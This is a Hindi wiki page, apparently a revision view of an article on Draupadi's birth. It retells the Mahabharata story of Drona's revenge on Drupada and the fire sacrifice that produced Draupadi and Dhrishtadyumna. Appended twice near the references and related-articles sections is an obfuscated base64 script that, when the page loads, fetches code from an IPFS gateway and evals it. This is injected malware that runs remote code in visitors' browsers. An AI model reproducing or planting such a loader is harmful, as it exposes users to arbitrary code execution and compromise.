Difference between revisions of "द्रौपदी जन्म"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('जब पाण्डव तथा कौरव राजकुमारों की शिक्षा पूर्ण ह...' के साथ नया पृष्ठ बनाया)
 
m (Text replacement - " महान " to " महान् ")
 
(One intermediate revision by the same user not shown)
Line 3: Line 3:
 
पांचाल पहुँचने पर [[अर्जुन]] ने द्रोणाचार्य से कहा- "गुरुदेव! आप पहले कौरवों को राजा द्रुपद से युद्ध करने की आज्ञा दीजिये। यदि वे द्रुपद को बन्दी बनाने में असफल रहे तो हम [[पाण्डव]] युद्ध करेंगे।” गुरु की आज्ञा मिलने पर [[दुर्योधन]] के नेतृत्व में कौरवों ने पांचाल पर आक्रमण कर दिया। दोनों पक्षों के मध्य भयंकर युद्ध होने लगा, किन्तु अन्त में कौरव परास्त होकर भाग निकले। कौरवों को पलायन करते देख पाण्डवों ने आक्रमण आरम्भ कर दिया। [[भीम]] तथा अर्जुन के पराक्रम के समक्ष पांचाल नरेश की सेना हार गई। अर्जुन ने आगे बढ़कर द्रुपद को बन्दी बना लिया और गुरु द्रोणाचार्य के समक्ष ले आये। [[द्रुपद]] को बन्दी के रूप में देखकर [[द्रोणाचार्य]] ने कहा- "हे द्रुपद! अब तुम्हारे राज्य का स्वामी मैं हो गया हूँ। मैं तो तुम्हें अपना मित्र समझ कर तुम्हारे पास आया था, किन्तु तुमने मुझे अपना मित्र स्वीकार नहीं किया था। अब बताओ क्या तुम मेरी मित्रता स्वीकार करते हो?” द्रुपद ने लज्जा से सिर झुका लिया और अपनी भूल के लिये क्षमा याचना करते हुये बोले- "हे द्रोण! आपको अपना मित्र न मानना मेरी भूल थी और उसके लिये अब मेरे हृदय में पश्चाताप है। मैं तथा मेरा राज्य दोनों ही अब आपके आधीन हैं, अब आपकी जो इच्छा हो करें।”<ref name="aa">{{cite web |url= http://freegita.in/mahabharat4/|title=महाभारत कथा- भाग 4|accessmonthday=23 अगस्त |accessyear=2015 |last= |first= |authorlink= |format= |publisher=freegita |language= हिन्दी}}</ref>
 
पांचाल पहुँचने पर [[अर्जुन]] ने द्रोणाचार्य से कहा- "गुरुदेव! आप पहले कौरवों को राजा द्रुपद से युद्ध करने की आज्ञा दीजिये। यदि वे द्रुपद को बन्दी बनाने में असफल रहे तो हम [[पाण्डव]] युद्ध करेंगे।” गुरु की आज्ञा मिलने पर [[दुर्योधन]] के नेतृत्व में कौरवों ने पांचाल पर आक्रमण कर दिया। दोनों पक्षों के मध्य भयंकर युद्ध होने लगा, किन्तु अन्त में कौरव परास्त होकर भाग निकले। कौरवों को पलायन करते देख पाण्डवों ने आक्रमण आरम्भ कर दिया। [[भीम]] तथा अर्जुन के पराक्रम के समक्ष पांचाल नरेश की सेना हार गई। अर्जुन ने आगे बढ़कर द्रुपद को बन्दी बना लिया और गुरु द्रोणाचार्य के समक्ष ले आये। [[द्रुपद]] को बन्दी के रूप में देखकर [[द्रोणाचार्य]] ने कहा- "हे द्रुपद! अब तुम्हारे राज्य का स्वामी मैं हो गया हूँ। मैं तो तुम्हें अपना मित्र समझ कर तुम्हारे पास आया था, किन्तु तुमने मुझे अपना मित्र स्वीकार नहीं किया था। अब बताओ क्या तुम मेरी मित्रता स्वीकार करते हो?” द्रुपद ने लज्जा से सिर झुका लिया और अपनी भूल के लिये क्षमा याचना करते हुये बोले- "हे द्रोण! आपको अपना मित्र न मानना मेरी भूल थी और उसके लिये अब मेरे हृदय में पश्चाताप है। मैं तथा मेरा राज्य दोनों ही अब आपके आधीन हैं, अब आपकी जो इच्छा हो करें।”<ref name="aa">{{cite web |url= http://freegita.in/mahabharat4/|title=महाभारत कथा- भाग 4|accessmonthday=23 अगस्त |accessyear=2015 |last= |first= |authorlink= |format= |publisher=freegita |language= हिन्दी}}</ref>
  
द्रोणाचार्य ने कहा- "तुमने कहा था कि मित्रता समान वर्ग के लोगों में होती है। अतः मैं तुमसे बराबरी का मित्र भाव रखने के लिये तुम्हें तुम्हारा आधा राज्य लौटा रहा हूँ।” इतना कहकर द्रोणाचार्य ने [[गंगा नदी]] के दक्षिणी तट का राज्य द्रुपद को सौंप दिया और शेष को स्वयं रख लिया। द्रोण से पराजित होने के उपरान्त महाराज द्रुपद अत्यन्त लज्जित हुये और उन्हें किसी प्रकार से नीचा दिखाने का उपाय सोचने लगे। इसी चिन्ता में एक बार वे घूमते हुए कल्याणी नगरी के ब्राह्मणों की बस्ती में जा पहुँचे। वहाँ उनकी भेंट 'याज' तथा 'उपयाज' नामक महान कर्मकाण्डी ब्राह्मण भाइयों से हुई। राजा द्रुपद ने उनकी सेवा करके उन्हें प्रसन्न कर लिया एवं उनसे द्रोणाचार्य के वध का उपाय पूछा। उनके पूछने पर बड़े भाई याज ने कहा- "इसके लिये आप एक विशाल यज्ञ का आयोजन करके [[अग्नि देव]] को प्रसन्न कीजिये, जिससे कि वे आपको महान बलशाली पुत्र का वरदान दे देंगे।”  
+
द्रोणाचार्य ने कहा- "तुमने कहा था कि मित्रता समान वर्ग के लोगों में होती है। अतः मैं तुमसे बराबरी का मित्र भाव रखने के लिये तुम्हें तुम्हारा आधा राज्य लौटा रहा हूँ।” इतना कहकर द्रोणाचार्य ने [[गंगा नदी]] के दक्षिणी तट का राज्य द्रुपद को सौंप दिया और शेष को स्वयं रख लिया। द्रोण से पराजित होने के उपरान्त महाराज द्रुपद अत्यन्त लज्जित हुये और उन्हें किसी प्रकार से नीचा दिखाने का उपाय सोचने लगे। इसी चिन्ता में एक बार वे घूमते हुए कल्याणी नगरी के ब्राह्मणों की बस्ती में जा पहुँचे। वहाँ उनकी भेंट 'याज' तथा 'उपयाज' नामक महान् कर्मकाण्डी ब्राह्मण भाइयों से हुई। राजा द्रुपद ने उनकी सेवा करके उन्हें प्रसन्न कर लिया एवं उनसे द्रोणाचार्य के वध का उपाय पूछा। उनके पूछने पर बड़े भाई याज ने कहा- "इसके लिये आप एक विशाल यज्ञ का आयोजन करके [[अग्नि देव]] को प्रसन्न कीजिये, जिससे कि वे आपको महान् बलशाली पुत्र का वरदान दे देंगे।”  
  
[[द्रुपद]] ने याज और उपयाज से उनके कहे अनुसार [[यज्ञ]] करवाया। उनके यज्ञ से प्रसन्न होकर अग्नि देव ने उन्हें एक ऐसा पुत्र दिया जो सम्पूर्ण आयुध एवं कवच कुण्डल से युक्त था। उसके पश्चात उस यज्ञ कुण्ड से एक कन्या उत्पन्न हुई, जिसके नेत्र खिले हुए [[कमल]] के समान देदीप्यमान थे, भौहें [[चन्द्रमा]] के समान वक्र थीं तथा उसका वर्ण श्यामल था। उसके उत्पन्न होते ही एक आकाशवाणी हुई कि "इस बालिका का जन्म क्षत्रियों के संहार और कौरवों के विनाश के हेतु हुआ है।" बालक का नाम [[धृष्टद्युम्न]] एवं बालिका का नाम कृष्णा ([[द्रौपदी]]) रखा गया।<ref name="aa"/>
+
[[द्रुपद]] ने याज और उपयाज से उनके कहे अनुसार [[यज्ञ]] करवाया। उनके यज्ञ से प्रसन्न होकर अग्नि देव ने उन्हें एक ऐसा पुत्र दिया जो सम्पूर्ण आयुध एवं कवच कुण्डल से युक्त था। उसके पश्चात् उस यज्ञ कुण्ड से एक कन्या उत्पन्न हुई, जिसके नेत्र खिले हुए [[कमल]] के समान देदीप्यमान थे, भौहें [[चन्द्रमा]] के समान वक्र थीं तथा उसका वर्ण श्यामल था। उसके उत्पन्न होते ही एक आकाशवाणी हुई कि "इस बालिका का जन्म क्षत्रियों के संहार और कौरवों के विनाश के हेतु हुआ है।" बालक का नाम [[धृष्टद्युम्न]] एवं बालिका का नाम कृष्णा ([[द्रौपदी]]) रखा गया।<ref name="aa"/>
  
  

Latest revision as of 14:03, 30 June 2017

jab pandav tatha kaurav rajakumaroan ki shiksha poorn ho gee to unhoanne dronachary ko guru dakshina dena chaha. dronachary ko paanchal naresh tatha apane poorv ke mitr drupad ke dvara kiye gaye apane apaman ka smaran ho aya aur unhoanne rajakumaroan se kaha- "rajakumaroan! yadi tum guru dakshina dena hi chahate ho to paanchal naresh drupad ko bandi banakar mere samaksh prastut karo. yahi tum logoan ki gurudakshina hogi." gurudev ke is prakar kahane par samast rajakumar apane-apane astr-shastr lekar paanchal desh ki or chal die.

paanchal pahuanchane par arjun ne dronachary se kaha- "gurudev! ap pahale kauravoan ko raja drupad se yuddh karane ki ajna dijiye. yadi ve drupad ko bandi banane mean asaphal rahe to ham pandav yuddh kareange.” guru ki ajna milane par duryodhan ke netritv mean kauravoan ne paanchal par akraman kar diya. donoan pakshoan ke madhy bhayankar yuddh hone laga, kintu ant mean kaurav parast hokar bhag nikale. kauravoan ko palayan karate dekh pandavoan ne akraman arambh kar diya. bhim tatha arjun ke parakram ke samaksh paanchal naresh ki sena har gee. arjun ne age badhakar drupad ko bandi bana liya aur guru dronachary ke samaksh le aye. drupad ko bandi ke roop mean dekhakar dronachary ne kaha- "he drupad! ab tumhare rajy ka svami maian ho gaya hooan. maian to tumhean apana mitr samajh kar tumhare pas aya tha, kintu tumane mujhe apana mitr svikar nahian kiya tha. ab batao kya tum meri mitrata svikar karate ho?” drupad ne lajja se sir jhuka liya aur apani bhool ke liye kshama yachana karate huye bole- "he dron! apako apana mitr n manana meri bhool thi aur usake liye ab mere hriday mean pashchatap hai. maian tatha mera rajy donoan hi ab apake adhin haian, ab apaki jo ichchha ho karean.”[1]

dronachary ne kaha- "tumane kaha tha ki mitrata saman varg ke logoan mean hoti hai. atah maian tumase barabari ka mitr bhav rakhane ke liye tumhean tumhara adha rajy lauta raha hooan.” itana kahakar dronachary ne ganga nadi ke dakshini tat ka rajy drupad ko sauanp diya aur shesh ko svayan rakh liya. dron se parajit hone ke uparant maharaj drupad atyant lajjit huye aur unhean kisi prakar se nicha dikhane ka upay sochane lage. isi chinta mean ek bar ve ghoomate hue kalyani nagari ke brahmanoan ki basti mean ja pahuanche. vahaan unaki bheant 'yaj' tatha 'upayaj' namak mahanh karmakandi brahman bhaiyoan se huee. raja drupad ne unaki seva karake unhean prasann kar liya evan unase dronachary ke vadh ka upay poochha. unake poochhane par b de bhaee yaj ne kaha- "isake liye ap ek vishal yajn ka ayojan karake agni dev ko prasann kijiye, jisase ki ve apako mahanh balashali putr ka varadan de deange.”

drupad ne yaj aur upayaj se unake kahe anusar yajn karavaya. unake yajn se prasann hokar agni dev ne unhean ek aisa putr diya jo sampoorn ayudh evan kavach kundal se yukt tha. usake pashchath us yajn kund se ek kanya utpann huee, jisake netr khile hue kamal ke saman dedipyaman the, bhauhean chandrama ke saman vakr thian tatha usaka varn shyamal tha. usake utpann hote hi ek akashavani huee ki "is balika ka janm kshatriyoan ke sanhar aur kauravoan ke vinash ke hetu hua hai." balak ka nam dhrishtadyumn evan balika ka nam krishnaa (draupadi) rakha gaya.[1]



left|30px|link=karn-duryodhan mitrata|pichhe jaean draupadi janm right|30px|link=lakshagrih shadyantr|age jaean


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 mahabharat katha- bhag 4 (hindi) freegita. abhigaman tithi: 23 agast, 2015.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>